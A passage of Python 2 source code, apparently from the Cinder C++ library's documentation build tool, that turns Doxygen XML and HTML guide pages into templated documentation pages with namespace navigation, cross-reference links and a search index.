a = gen_link_tag(bs4, base.qualifiedName, path_join(HTML_DEST_PATH, a["href"]))
li.append(a)
else:
li.append(base.qualifiedName)
ul.append(li)
return ul
def replace_tag(bs4, tree, parent_tag, content):
tag = tree.tag
attrib = tree.attrib
has_parent = False
tag_name = None
if parent_tag and parent_tag.parent:
has_parent = True
# change parentTag if necessary
if tag == "codeline":
parent_tag = parent_tag.code
# find html tag based on tag
if tag == "para":
if has_parent and parent_tag.parent.dl:
tag_name = "dd"
else:
tag_name = tagDictionary[tag]
elif tag == "sp":
if content is None:
content = " "
else:
content.append(" ")
# get tag equivalent
if tag in tagDictionary:
tag_name = tagDictionary[tag]
new_tag = define_tag(bs4, tag_name, tree)
else:
# TODO: replace with nothing - no new tag
tag_name = "span"
new_tag = define_tag(bs4, tag_name, tree)
add_class_to_tag(new_tag, tag)
content_tag = new_tag
# if simplesect, construct with some content
if tag == "simplesect":
see_tag = bs4.new_tag("dt")
add_class_to_tag(see_tag, "section")
# "see also" reference
if attrib["kind"] == "see":
add_class_to_tag(see_tag, "see")
see_tag.string = "See Also"
new_tag.append(see_tag)
if tag == "programlisting":
code_tag = bs4.new_tag("code")
add_class_to_tag(code_tag, "language-cpp")
new_tag.append(code_tag)
content_tag = code_tag
if tag == "computeroutput":
if content:
content = content.strip()
if content is not None:
content_tag.append(content)
parent_tag.append(new_tag)
return new_tag
def iterate_markup(bs4, tree, parent):
if tree is None:
return
current_tag = parent
content = None
# add content to tag as is ( no stripping of whitespace )
if tree.text is not None:
content = tree.text
# append any new tags
if tree.tag is not None:
html_tag = replace_tag(bs4, tree, current_tag, content)
# if tree parent == <p> && newTag == <pre>
# add a new pre tag in and make that the current parent again
current_tag = html_tag
# iterate through children tags
for child in list(tree):
iterate_markup(bs4, child, current_tag)
# tail is any extra text that isn't wrapped in another tag
# that exists before the next tag
if tree.tail is not None:
parent.append(tree.tail)
if tree.tail.endswith(";"):
parent.append(gen_tag(bs4, "br"))
return current_tag
def markup_brief_description(bs4, tree, description_el=None):
if description_el is None:
description_el = gen_tag(bs4, "div", ["description", "content"])
brief_desc = tree.findall(r'briefdescription/')
if brief_desc is None:
return
else:
for desc in brief_desc:
iterate_markup(bs4, desc, description_el)
return description_el
def markup_description(bs4, tree):
description_el = gen_tag(bs4, "div", ["description", "content"])
# mark up brief description first
markup_brief_description(bs4, tree, description_el)
# mark up detailed description next
detailed_desc = tree.findall(r'detaileddescription/')
if detailed_desc is not None:
for desc in detailed_desc:
iterate_markup(bs4, desc, description_el)
return description_el
def replace_code_chunks(bs4):
"""
Looks though the html and replaces any code chunks that exist
in a paragraph and splits them up so that we can use pre tags.
:param bs4:
:return:
"""
# find all the code chunks
code_chunks = bs4.find_all("div", "programlisting")
code_chunks += bs4.find_all("span", "programlisting")
for chunk in code_chunks:
pre_tag = bs4.new_tag("pre")
code_tag = bs4.new_tag("code")
add_class_to_tag(code_tag, "language-cpp")
# for each code line, add a line of that text to the new div
codeline = chunk.find_all("div", "codeline")
codeline += chunk.find_all("span", "codeline")
if codeline:
for line in codeline:
line_text = ""
for c in line.contents:
if type(c) is Tag:
line_text += c.text
else:
line_text += c
code_tag.append(line_text + "\n")
pre_tag.append(code_tag)
# replace content in code chunks
chunk.clear()
replacement_span = gen_tag(bs4, "span")
replacement_span.append(pre_tag)
chunk.append(pre_tag)
# clone an element
# from: http://stackoverflow.com/questions/23057631/clone-element-with-beautifulsoup/23058678#23058678
def clone(el):
if isinstance(el, NavigableString):
return type(el)(el)
tag_copy = Tag(None, el.builder, el.name, el.namespace, el.nsprefix)
# work around bug where there is no builder set
# https://bugs.launchpad.net/beautifulsoup/+bug/1307471
tag_copy.attrs = dict(el.attrs)
tag_copy.index = el.index
for attr in ('can_be_empty_element', 'hidden'):
setattr(tag_copy, attr, getattr(el, attr))
for child in el.contents:
tag_copy.append(clone(child))
return tag_copy
# pull a templated chunk of html out of the selected bs4 file
def get_template(bs4, element_id):
templates = bs4.find_all('template')
template = None
for t in templates:
# [0] is a string before the enclosed div, so used [1] instead
if t['id'] == element_id:
template = clone(list(t.contents)[1])
else:
continue
return template
def inject_html(src_content, dest_el, src_path, dest_path):
"""
Append a chunk of html into a specific div
:param src_content: The src html to be injected
:param dest_el: The div to inject the src html into
:param src_path: The path of the src file so that we can gix teh relative links
:return:
"""
if not dest_el:
log("destination element does not exist", 1)
update_links(src_content, src_path, src_path, dest_path)
try:
# copy source content into to bs4 instance so that we can copy over without messing up the source
bs4 = BeautifulSoup(str(src_content).decode("UTF-8"))
# copy all Tags over to dest element
for content in bs4.body.contents:
if type(content) is Tag:
dest_el.append(content)
except AttributeError as e:
log("appending html content to element [ " + e.message + " ]", 2)
def iterate_namespace(bs4, namespaces, tree, index, label):
# Get namespace of previous child, unless first
if index == 0:
parent_ns = ""
else:
parent_ns = namespaces[index - 1].name
count = index
child_count = 0
# iterate to find all children of parentNs
for ns in namespaces[index:]:
namespace = ns.name # full namespace
ns_parts = namespace.split("::")
prefix = "::".join(ns_parts[:-1]) # parent namespace up to last ::
name = "".join(ns_parts[-1])
node_label = label + str(child_count)
# check if derived from any parent
parent_is_derived = has_ancestor(namespaces, namespace)
# create a list item for the namespace
ns_li = gen_tag(bs4, "li")
ns_li["data-namespace"] = namespace
# create link for each item
a_tag = gen_link_tag(bs4, name, path_join(HTML_SOURCE_PATH, ns.path))
# is decendent of parent namespace
if prefix == parent_ns:
child_count += 1
# append to parent
tree.append(ns_li)
# generate new nested ul in case there are children
ns_ul = gen_tag(bs4, "ul")
if count < len(namespaces):
# if there are children, add to the parent ul
if iterate_namespace(bs4, namespaces, ns_ul, count + 1, node_label) > 0:
# add input
input_el = gen_tag(bs4, "input")
input_el["type"] = "checkbox"
input_el["id"] = "item-" + "-".join(list(node_label))
# root is expanded by default
if index == 0:
input_el.attrs["checked"] = "true"
label_tag = gen_tag(bs4, "label")
label_tag["for"] = "item-" + "-".join(list(node_label))
label_tag.append(a_tag)
ns_li.insert(0, input_el)
ns_li.append(label_tag)
ns_li.append(ns_ul)
else:
ns_li.append(a_tag)
else:
# has no direct descendent on the parent, so add it independently
if parent_is_derived is False and index is 0:
child_count += 1
indie_li = gen_tag(bs4, "li")
# indieLi.append( prefix )
# TODO: refactor and simplify some of this stuff
input_el = gen_tag(bs4, "input")
input_el["type"] = "checkbox"
input_el["id"] = "item-" + "-".join(list(node_label))
indie_li.insert(0, input_el)
label_tag = gen_tag(bs4, "label")
label_tag["for"] = "item-" + "-".join(list(node_label))
label_tag.append(prefix)
indie_li.append(label_tag)
indie_ul = gen_tag(bs4, "ul")
indie_li.append(indie_ul)
indie_ul.append(ns_li)
ns_li.append(a_tag)
tree.append(indie_li)
count += 1
return child_count
def has_ancestor(namespaces, compare_namespace):
compare_prefix = "::".join(compare_namespace.split("::")[0])
# hasAncestor = False
for ns in namespaces:
namespace = ns.name
prefix = "::".join(namespace.split("::")[0])
if prefix == compare_prefix and compare_namespace != namespace:
return True
return False
def generate_namespace_nav():
"""
Creates a div filled with a list of namespace links
:param bs4: The Beautiful soup instance used for dom manipulation
:return: a new div that contains the navigation tree
"""
bs4 = BeautifulSoup()
namespaces = g_symbolMap.get_whitelisted_namespaces()
# tree = gen_tag(bs4, "div")
ul = gen_tag(bs4, "ul")
# tree.append(ul)
add_class_to_tag(ul, "css-treeview")
ul["id"] = "namespace-nav"
iterate_namespace(bs4, namespaces, ul, 0, "")
return ul
def find_typedefs_of(class_name, typedef_list):
"""
Finds typedef objects that are shared from the given class within a given namespace
:return: list if SymbolMap.Typedef objects
"""
typedefs = []
class_name = strip_compound_name(class_name)
for typedef in typedef_list:
if typedef.sharedFrom:
if typedef.sharedFrom.name == class_name:
typedefs.append(typedef)
return typedefs
# ============================================================================================ File Processing Functions
def process_xml_file_definition(in_path, out_path, file_type):
"""
Process an xml file definition, such as a class, namespace, or group
:param in_path: xml file location
:param out_path: final html file location
:param file_type: "class", "namespace", or "group"
:return:
"""
# we dont like files that start with '_'
if os.path.basename(in_path).startswith("_"):
return
# define the tree that contains all the data we need to populate this page
tree = parse_xml(in_path)
if tree is None:
return
if file_type == "class":
if any(in_path.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
log("Skipping file | Class " + in_path + " blacklisted", 0)
return
html_template = config.CLASS_TEMPLATE
file_data = fill_class_content(tree)
section = "classes"
body_class = "classes"
elif file_type == "namespace":
html_template = config.NAMESPACE_TEMPLATE
file_data = fill_namespace_content(tree)
if not file_data:
return
section = "namespaces"
body_class = "namespaces"
elif file_type == "module":
html_template = config.GROUP_TEMPLATE
file_data = fill_group_content(tree, config.GLM_MODULE_CONFIG)
section = "reference"
body_class = "reference"
else:
log("Skipping " + in_path, 1)
return
log_progress('Processing file: ' + str(in_path))
# Generate the html file from the template and inject content
file_content = file_data.get_content()
bs4 = render_template(html_template, file_content)
content_dict = {
"page_title": file_content["title"],
"main_content": get_body_content(bs4),
"body_class": body_class,
"section_namespace": "cinder",
str("section_" + section): "true"}
# append file meta
content_dict.update(file_meta.copy())
# render within main template
bs4 = render_template(os.path.join(TEMPLATE_PATH, "master-template.mustache"), content_dict)
# make sure all links are absolute
update_links_abs(bs4, TEMPLATE_PATH)
if not bs4:
log("Skipping class due to something nasty. Bother Greg and try again some other time. Error rendering: " + in_path, 2)
return
# print output
# update links in the template
update_links(bs4, TEMPLATE_PATH + "htmlContentTemplate.html", TEMPLATE_PATH, out_path)
# replace any code chunks with <pre> tags, which is not possible on initial creation
replace_code_chunks(bs4)
# link up all ci tags
for tag in bs4.find_all('ci'):
process_ci_tag(bs4, tag, in_path, out_path)
# add to search index
link_path = gen_rel_link_tag(bs4, "", out_path, HTML_SOURCE_PATH, HTML_DEST_PATH)["href"]
add_to_search_index(bs4, link_path, file_data.kind, file_data.search_tags)
# deactivate invalid relative links
for link in bs4.find_all("a"):
if link.has_attr("href") and link["href"].startswith("_"):
# replace <a> with <span>
dead_tag = gen_tag(bs4, "span", None, link.string)
link.replace_with(dead_tag)
# write the file
write_html(bs4, out_path)
def parse_namespaces(tree, sections):
namespaces = []
if config.is_section_whitelisted(sections, "namespaces"):
for member in tree.findall(r"compounddef/innernamespace"):
link = path_join(HTML_DEST_PATH, member.attrib["refid"] + ".html")
link_data = LinkData(link, member.text)
namespaces.append(link_data)
return namespaces
def parse_classes(tree, sections):
classes = []
if config.is_section_whitelisted(sections, "classes"):
for member in tree.findall(r"compounddef/innerclass[@prot='public']"):
link = member.attrib["refid"] + ".html"
rel_link = path_join(HTML_DEST_PATH, link)
link_data = LinkData(rel_link, member.text)
kind = "struct" if link.startswith("struct") else "class"
class_obj = {
"link_data": link_data,
"kind": kind
}
classes.append(class_obj)
return classes
def parse_typedefs(bs4, tree, sections):
typedefs = []
if config.is_section_whitelisted(sections, "typedefs"):
section_config = config.get_section_config(sections, "typedefs")
if section_config:
prefix_blacklist = section_config["prefix_blacklist"] if section_config.has_key("prefix_blacklist") else None
else:
prefix_blacklist = None
for member in tree.findall(r"compounddef/sectiondef/[@kind='typedef']/memberdef/[@kind='typedef']"):
member_name = member.find(r"name").text
if prefix_blacklist and any(member_name.startswith(blacklisted) > 0 for blacklisted in prefix_blacklist):
# skip this blacklisted typedef
continue
typedef_obj = parse_member_definition(bs4, member)
typedefs.append(typedef_obj)
return typedefs
def parse_enums(bs4, tree, sections):
enums = []
if config.is_section_whitelisted(sections, "enums"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='enum']/memberdef/[@kind='enum']"):
member_obj = parse_enum(bs4, member)
enums.append(member_obj)
return enums
def parse_functions(bs4, tree, sections):
fns = []
if config.is_section_whitelisted(sections, "functions"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='func']/memberdef/[@kind='function']"):
function_obj = parse_member_definition(bs4, member)
fns.append(function_obj)
return fns
def parse_free_functions(bs4, tree, sections):
free_fns = []
if config.is_section_whitelisted(sections, "free_functions"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='user-defined']/memberdef/[@kind='function']"):
function_obj = parse_member_definition(bs4, member)
free_fns.append(function_obj)
return free_fns
def parse_vars(bs4, tree, sections):
variables = []
if config.is_section_whitelisted(sections, "variables"):
for member in tree.findall(r"compounddef/sectiondef/[@kind='var']/memberdef/[@kind='variable']"):
var_obj = parse_member_definition(bs4, member)
initializer = member.find('initializer').text if member.find('initializer') is not None else None
var_obj["definition"]["args"] = initializer
variables.append(var_obj)
return variables
def fill_class_content(tree):
"""
Populates the class content object with data
:param tree:
:return:
"""
bs4 = BeautifulSoup()
file_data = ClassFileData(tree)
include_file = ""
include_path = ""
include_tag = tree.find(r"compounddef/includes")
location_tag = tree.find(r"compounddef/location")
if location_tag is not None:
include_path = "/".join(location_tag.attrib["file"].split("/")[1:])
if include_tag is not None:
include_file = include_tag.text
class_name = file_data.name
file_def = g_symbolMap.find_file(include_file)
class_def = g_symbolMap.find_class(class_name)
# class template stuff ------------------------------ #
file_data.is_template = True if tree.find(r"compounddef/templateparamlist") is not None else False
if file_data.is_template:
try:
def_name = tree.find(r"compounddef/templateparamlist/param/type")
file_data.template_def_name = def_name.text if def_name is not None else ""
except Exception as e:
file_data.template_def_name = ""
log(e.message, 1)
if not class_def:
log("NO CLASS OBJECT DEFINED FOR: " + class_name, 1)
# raise
# return
# page title ---------------------------------------- #
file_data.title = file_data.name
# add namespace nav --------------------------------- #
file_data.namespace_nav = str(g_namespaceNav)
# page header --------------------------------------- #
file_data.page_header = file_data.compoundName
# add description ----------------------------------- #
description = markup_description(bs4, tree.find(r'compounddef'))
file_data.description = str(description) if description is not None else ""
# includes ------------------------------------------ #
include_link = None
if include_file and include_path:
file_obj = g_symbolMap.find_file(include_file)
github_path = config.GITHUB_PATH + '/include/' + include_path
if file_obj:
include_link = LinkData(github_path, include_path)
file_data.includes = include_link
# typedefs ------------------------------------------ #
typedefs = []
ns_obj = g_symbolMap.find_namespace(file_data.namespace)
if ns_obj and ns_obj.typedefs:
class_typedefs = find_typedefs_of(class_name, ns_obj.typedefs)
if file_def is not None:
for t in class_typedefs:
link_data = LinkData()
link_data.label = t.name
link_path = path_join(HTML_DEST_PATH, t.path)
link_data.link = link_path
typedefs.append(link_data)
file_data.typedefs = typedefs
# class hierarchy ----------------------------------- #
if class_def:
class_hierarchy = gen_class_hierarchy(bs4, class_def)
file_data.class_hierarchy = str(class_hierarchy) if class_hierarchy else None
# class list ---------------------------------------- #
classes = []
for classDef in tree.findall(r"compounddef/innerclass[@prot='public']"):
link_data = LinkData()
link_data.label = strip_compound_name(classDef.text)
link_data.link = path_join(HTML_DEST_PATH, classDef.attrib["refid"] + ".html")
classes.append(link_data)
file_data.classes = classes
# related links ------------------------------------ #
# generated by guides and references
related = []
if class_def:
if class_def.relatedLinks:
for link_data in class_def.relatedLinks:
related.append(link_data)
# ci prefix / description ----------------------- #
# if the class has a prefix, add it here
if class_def.prefix_content:
file_data.prefix = class_def.prefix_content
file_data.related = related
# enumerations -------------------------------------- #
enumerations = []
for e in tree.findall(r"compounddef/sectiondef/memberdef[@kind='enum']"):
member_obj = parse_enum(bs4, e)
enumerations.append(member_obj)
file_data.enumerations = enumerations
# TODO: Look into and re-evaluate if this is needed or not since the definitions are all over the map and may be an edge case
# public types -------------------------------------- #
# public_types = []
# # for member in tree.findall(r"compounddef/sectiondef/memberdef[@kind='typedef']"):
# for member in tree.findall(r"compounddef/sectiondef[@kind='public-type']/memberdef[@prot='public']"):
#
# member_obj = None
# print member.attrib["kind"]
# if member.attrib["kind"] == "enum":
# member_obj = parse_member_definition(bs4, member)
# member_obj["return"] = "enum"
# enum_link = gen_link_tag(bs4, member_obj["name"], "#"+find_member_anchor(member))
# member_obj["definition"]["name"] = str(enum_link)
# else:
# member_obj = parse_function(bs4, member, class_name)
# print member.attrib["kind"]
# print member.find("name").text
#
# if member_obj is None:
# continue
#
# public_types.append(member_obj)
#
# file_data.public_types = public_types
# public member Functions --------------------------- #
public_fns = []
public_static_fns = []
for memberFn in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="public"]'):
function_obj = parse_function(bs4, memberFn, class_name)
is_static = memberFn.attrib["static"]
if is_static == 'yes':
public_static_fns.append(function_obj)
else:
public_fns.append(function_obj)
file_data.public_functions = public_fns
file_data.public_static_functions = public_static_fns
# protected member functions ------------------------ #
protected_functions = []
for member in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="protected"]'):
function_obj = parse_function(bs4, member, class_name)
protected_functions.append(function_obj)
file_data.protected_functions = protected_functions
# protected attributes ------------------------------ #
protected_attrs = []
for v in tree.findall(r'compounddef/sectiondef/memberdef[@kind="variable"][@prot="protected"]'):
member_obj = parse_member_definition(bs4, v)
protected_attrs.append(member_obj)
file_data.protected_attrs = protected_attrs
# friends ------------------------------------------- #
friends = []
for member in tree.findall(r'compounddef/sectiondef/memberdef[@kind="friend"]'):
member_obj = parse_member_definition(bs4, member)
# replace name with link to class
friend_class = g_symbolMap.find_class(member_obj["name"])
# link up friend, if class exists
if friend_class:
friend_link = gen_rel_link_tag(bs4, friend_class.name, friend_class.path, TEMPLATE_PATH, HTML_DEST_PATH)
member_obj["definition"]["name"] = str(friend_link)
friends.append(member_obj)
file_data.friends = friends
if class_def:
file_data.search_tags = class_def.tags
return file_data
def fill_namespace_content(tree):
bs4 = BeautifulSoup()
if tree is None:
return
# get common data for the file
file_data = NamespaceFileData(tree)
ns_def = g_symbolMap.find_namespace(file_data.name)
if ns_def:
if config.is_namespace_blacklisted(ns_def.name):
log("Skipping file | Namespace " + ns_def.name + " blacklisted", 1)
return
else:
log("Skipping: tree is not defined", 1)
return
# return result of special glm namespace content filling
# TODO: If we get here, that means the namespace is NOT blacklisted, so this is where we check if each piece is whitelisted, if that array is empty, we assume that it's all whitelisted
ns_config = config.get_ns_config(ns_def.name)
if ns_config and ns_config.has_key("structure_whitelist"):
sections = ns_config["structure_whitelist"]
else:
sections = None
# if ns_def.name == "glm":
# return fill_glm_namespace_content(tree)
# page title ---------------------------------------- #
file_data.title = file_data.name
# add namespace nav --------------------------------- #
file_data.namespace_nav = str(g_namespaceNav)
# add namespaces ------------------------------------ #
file_data.namespaces = parse_namespaces(tree, sections)
# add classes --------------------------------------- #
file_data.classes = parse_classes(tree, sections)
# add typedefs -------------------------------------- #
file_data.typedefs = parse_typedefs(bs4, tree, sections)
# add enumerations ---------------------------------- #
file_data.enumerations = parse_enums(bs4, tree, sections)
# functions ----------------------------------------- #
file_data.functions = parse_functions(bs4, tree, sections)
# free functions ------------------------------------ #
file_data.free_functions = parse_free_functions(bs4, tree, sections)
# variables ----------------------------------------- #
file_data.variables = parse_vars(bs4, tree, sections)
# define search tags
if ns_def:
file_data.search_tags = ns_def.tags
else:
file_data.search_tags = []
file_data.search_tags.extend(["namespace"])
return file_data
def fill_group_content(tree, module_config):
bs4 = BeautifulSoup()
file_data = GroupFileData(tree, module_config)
group_name = file_data.name
group_def = g_symbolMap.find_group(group_name)
if not group_def:
log("NO CLASS OBJECT DEFINED FOR: " + group_name, 1)
# return
# page title ---------------------------------------- #
file_data.title = file_data.name
# page header --------------------------------------- #
file_data.page_header = file_data.name
# add description ----------------------------------- #
description = markup_description(bs4, tree.find(r'compounddef'))
file_data.description = str(description) if description is not None else ""
# submodules ---------------------------------------- #
subgroups = []
for subgroup in group_def.subgroups:
subgroup_obj = {
"label": subgroup.name,
"link": subgroup.path
}
subgroups.append(subgroup_obj)
file_data.subgroups = subgroups
# typedefs ------------------------------------------ #
typedefs = []
for member in tree.findall(r"compounddef/sectiondef/[@kind='typedef']/memberdef/[@kind='typedef']"):
typedef_obj = parse_member_definition(bs4, member)
typedefs.append(typedef_obj)
file_data.typedefs = typedefs
# ci prefix / description --------------------------- #
# if the group has a prefix, add it here
if group_def.prefix_content is not None:
file_data.prefix = group_def.prefix_content
# # enumerations -------------------------------------- #
# enumerations = []
# for e in tree.findall(r"compounddef/sectiondef/memberdef[@kind='enum']"):
# member_obj = parse_enum(bs4, e)
# enumerations.append(member_obj)
# file_data.enumerations = enumerations
# public member Functions --------------------------- #
public_fns = []
public_static_fns = []
for memberFn in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="public"]'):
function_obj = parse_function(bs4, memberFn, group_name)
is_static = memberFn.attrib["static"]
if is_static == 'yes':
public_static_fns.append(function_obj)
else:
public_fns.append(function_obj)
file_data.public_functions = public_fns
file_data.public_static_functions = public_static_fns
if group_def:
file_data.search_tags = group_def.tags
return file_data
def process_html_file(in_path, out_path):
""" Parses an html file.
- Adds template around the html
- Copy original css and js links into new hmtl
- Save html in destination dir
"""
# log_progress('Processing file: ' + str(in_path))
print 'Processing file: ' + str(in_path)
# relative path in relation to the in_path (htmlsrc/)
local_rel_path = os.path.relpath(in_path, HTML_SOURCE_PATH)
# directory name of the path
in_dir = os.path.dirname(in_path)
# file name
in_file_name = os.path.basename(in_path)
# skip if it starts with "_", which means that it's not a first class citizen file and is supplemental
if in_file_name.startswith("_"):
return
# get common data for the file
file_data = HtmlFileData(in_path)
# searchable by default
is_searchable = True
# tags for search engine
search_tags = []
# selected section of the website
section = ""
# parse guide config (if present in current directory)
# this determines which function is used to generate dynamic page, which template to use, etc
config_data = parse_config(in_dir, in_file_name)
if config_data:
# add search tags
for k in config_data.keywords:
search_tags.append(k)
# plug in subnav data
file_data.pagenav = config_data.pagenav
# get correct template for the type of file
template = config.HTML_TEMPLATE
body_class = "default"
if in_path.find("htmlsrc" + os.sep + "index.html") > -1:
template = config.HOME_TEMPLATE
is_searchable = False
body_class = "section_home"
section = "home"
elif in_path.find("reference"+os.sep) > -1:
template = config.REFERENCE_TEMPLATE
body_class = "reference"
section = "reference"
elif in_path.find("guides"+os.sep) > -1:
template = config.GUIDE_TEMPLATE
body_class = "guide"
section = "guides"
# fill content ----------------------------------------
# get source file body content
orig_html = generate_bs4(in_path)
# extract original scripts to append later
orig_scripts = []
for x in orig_html.findAll("script"):
orig_scripts.append(x.extract())
orig_links = []
# get title
if orig_html.head:
if orig_html.head.title:
file_data.title = orig_html.head.title.text
for x in orig_html.findAll('link', rel="stylesheet"):
orig_links.append(x.extract())
# if there is a specific page that needs some special dynamic content, this is where we do it
insert_div_id = ""
dynamic_div = gen_tag(orig_html, "body")
for data in config.DYNAMIC_PAGES_CONFIG:
if "reference_html" in data and data["reference_html"] == local_rel_path:
is_searchable = bool(data["searchable"])
markup = generate_dynamic_markup(data)
for content in markup.body.contents:
dynamic_div.append(content)
insert_div_id = data["element_id"]
if "section" in data:
section = data["section"]
# inject dynamic content into orig_html
if insert_div_id:
insert_el = orig_html.find(id=insert_div_id)
inject_html(dynamic_div, insert_el, in_path, out_path)
# get body content out of bs4 and plug into file_data
body_content = get_body_content(orig_html)
file_data.html_content = body_content
file_content = file_data.get_content()
# render file template
bs4 = render_template(template, file_content)
update_links_abs(bs4, os.path.dirname(in_path))
content_dict = {'page_title': file_content["title"], 'main_content': get_body_content(bs4), 'body_class': body_class, str("section_" + section): "true"}
# append file meta
content_dict.update(file_meta.copy())
# plug everything into the master template
bs4 = render_template(os.path.join(TEMPLATE_PATH, "master-template.mustache"), content_dict)
# make sure all links are absolute
update_links_abs(bs4, TEMPLATE_PATH)
# now all links shoul be relative to out path
update_links(bs4, TEMPLATE_PATH, in_path, out_path)
if bs4 is None:
log("Error generating file, so skipping: " + in_path, 2)
return
# get list of all the css and js links in the new bs4
link_list = bs4.head.find_all("link")
script_list = bs4.body.find_all("script")
# copy any css paths that may be in the original html and paste into new file
for link in orig_links:
# do not add duplicates
if any(link_item["href"] == link["href"] for link_item in link_list):
continue
if bs4.head:
bs4.head.append(link)
# append original scripts to the end
for script in orig_scripts:
# do not add duplicates
if script.has_attr("src") and any(script_item.has_attr("src") and script_item["src"] == script["src"] for script_item in script_list):
continue
if bs4.body:
bs4.body.append(script)
if orig_html.head:
if bs4.head:
for d in orig_html.head.find_all("ci"):
bs4.head.append(d)
# add ci seealso tags from config to bs4 head if it's the first in a group
if config_data and config_data.order == 0:
seealso_label = config_data.see_also_label
for tag in config_data.see_also_tags:
ci_tag = gen_tag(bs4, "ci")
ci_tag.attrs["seealso"] = ""
ci_tag.attrs["label"] = seealso_label
ci_tag.attrs["dox"] = tag
bs4.head.append(ci_tag)
# add tags from the meta keywords tag
for meta_tag in orig_html.head.findAll(attrs={"name": "keywords"}):
for keyword in meta_tag['content'].split(','):
search_tags.append(keyword.encode('utf-8').strip())
# look for any meta 'group' tags to tell us that it's part of a grpup that will need nav
for meta_tag in orig_html.head.findAll(attrs={"name": "group"}):
if meta_tag['content']:
file_data.group = meta_tag['content']
# link up all ci tags
for tag in bs4.find_all('ci'):
process_ci_tag(bs4, tag, in_path, out_path)
if in_path.find("_docs/") < 0:
if is_searchable:
link_path = gen_rel_link_tag(bs4, "", out_path, HTML_SOURCE_PATH, HTML_DEST_PATH)["href"]
add_to_search_index(bs4, link_path, file_data.kind_explicit, search_tags)
state.add_html_file(file_data)
file_data.path = out_path
write_html(bs4, out_path)
def parse_config(path, file_name):
# if "config.json" exists in path directory
config_path = os.path.join(path, "config.json")
if os.path.exists(config_path):
# load and turn into GuideConfig object
with open(config_path) as data_file:
try:
config_data = json.load(data_file)
guide_config = GuideConfig(config_data, path, file_name)
except Exception as e:
log(str(e), 2)
raise
return guide_config
else:
return None
# ============================================================================================== Dynamic Page Generation
def generate_dynamic_markup(ref_data):
# find template if it exists
ref_id = ref_data["id"]
if ref_id == "glm":
return_markup = generate_glm_reference()
elif ref_id == "namespaces":
return_markup = generate_namespace_data()
elif ref_id == "classes":
return_markup = generate_class_list_data()
else:
return_markup = "NOTHING FOUND"
log("No rules for generating dynamic content for id'" + ref_id + "' was found", 1)
# plug data into template (if it exists)
template_path = os.path.join(TEMPLATE_PATH, ref_data["template"])
markup = render_template(template_path, return_markup)
return markup
def generate_glm_reference():
glm_group_data = {
"groups": []
}
# add group data to glm reference data object
for group_name in g_symbolMap.groups:
group = g_symbolMap.find_group(group_name)
group_data = {}
group_data["name"] = group.title
group_data["path"] = group.path
group_data["description"] = group.description
subgroups = []
if len(group.subgroups) > 0:
for subgroup in group.subgroups:
subgroup_data = {}
subgroup_data["name"] = subgroup.title
subgroup_data["path"] = subgroup.path
subgroup_data["description"] = subgroup.description
subgroups.append(subgroup_data)
group_data["subgroups"] = subgroups
glm_group_data["groups"].append(group_data)
return glm_group_data
def generate_namespace_data():
ns_data = {
"namespaces": []
}
namespaces = g_symbolMap.get_whitelisted_namespaces()
for ns in namespaces:
ns = {
"link": ns.path,
"label": ns.name
}
ns_data["namespaces"].append(ns)
return ns_data
def generate_class_list_data():
classlist_data = {
"classes": []
}
classes = g_symbolMap.get_ordered_class_list()
for c in classes:
class_data = {
"link": c.path,
"label": c.name
}
classlist_data["classes"].append(class_data)
return classlist_data
# ===================================================================================================== CI Tag Functions
def process_ci_tag(bs4, tag, in_path, out_path):
"""
Depending on the attributes of the ci tag, do something different
:param bs4: The current beautiful soup instance
:param tag: The ci tag to process
:param in_path: The path to the current processed html file
:param out_path: The save path to the prcessing html file
:return:
"""
if tag.has_attr("seealso"):
process_ci_seealso_tag(bs4, tag, out_path)
elif tag.has_attr("prefix"):
process_ci_prefix_tag(bs4, tag, in_path)
# elif tag.has_attr("source"):
# process_ci_source_tag(bs4, tag)
else:
replace_ci_tag(bs4, tag, in_path, out_path)
def replace_ci_tag(bs4, link, in_path, out_path):
ref_obj = find_ci_tag_ref(link)
if ref_obj:
ref_location = path_join(HTML_DEST_PATH, ref_obj.path)
new_link = gen_rel_link_tag(bs4, link.contents, ref_location, in_path, out_path)
# transfer tag classes to new tag
tag_classes = link["class"] if link.has_attr("class") else None
if tag_classes:
for c in tag_classes:
add_class_to_tag(new_link, c)
add_class_to_tag(new_link, "ci")
link.replace_with(new_link)
else:
log("Could not find replacement tag for ci tag: " + str(link), 1)
def process_ci_seealso_tag(bs4, tag, out_path):
"""
Processes ci tag that is of 'seealso' type
:param bs4: The active beautiful soup instance
:param tag: the ci tag to find a reference for
:param out_path: the file path
:return: None
"""
ref_obj = find_ci_tag_ref(tag)
# get label attribute value if there is one
if tag.has_attr("label"):
label = tag["label"]
# otherwise use the name of the file as the label
else:
label = get_file_name(out_path)
# link_tag = gen_link_tag(bs4, label, out_path)
link_data = LinkData(out_path.replace("\\", "/"), label)
# if type(ref_obj) is SymbolMap.Class or type(ref_obj) is SymbolMap.Typedef:
if type(ref_obj) is SymbolMap.Class:
ref_obj.add_related_link(link_data)
elif type(ref_obj) is SymbolMap.Namespace:
# find all classes with that namespace and add guide to every one
for class_obj in g_symbolMap.find_classes_in_namespace(ref_obj.name):
class_obj.add_related_link(link_data)
else:
log("Could not find seealso reference for " + str(tag), 1)
def process_ci_prefix_tag(bs4, tag, in_path):
"""
Finds the referenced tag's object if existent and adds the path to the prefix file to the class to be parsed later
:param tag: The ci tag with a defined prefix attribute
:param in_path: The path to the refix content
:return:
"""
in_path = in_path.replace('\\', '/')
in_dir = get_path_dir(in_path)
obj_ref = find_ci_tag_ref(tag)
if obj_ref and type(obj_ref) is SymbolMap.Class:
# get tag content
prefix_content = ""
for c in tag.contents:
content = c.encode("utf-8", errors="replace")
prefix_content += content
# generate bs4 from content and update links as reltive from the template path
# could alternatively set the absolute paths of content, which would then be turned into rel paths later
new_bs4 = generate_bs4_from_string(prefix_content)
update_links(new_bs4, in_dir, in_path, TEMPLATE_PATH)
# get updated body content and assign as prefix_content
prefix_content = ""
for c in new_bs4.body:
content = c.encode("utf-8", errors="replace")
prefix_content += content
obj_ref.define_prefix(prefix_content)
# TODO: add ability to replace ci tag with link to github source file
# def process_ci_source_tag(bs4, tag):
# """
# Replace the ci tag with a link to a source file on github
# :param tag: the tag to find a link for
# :return:
# """
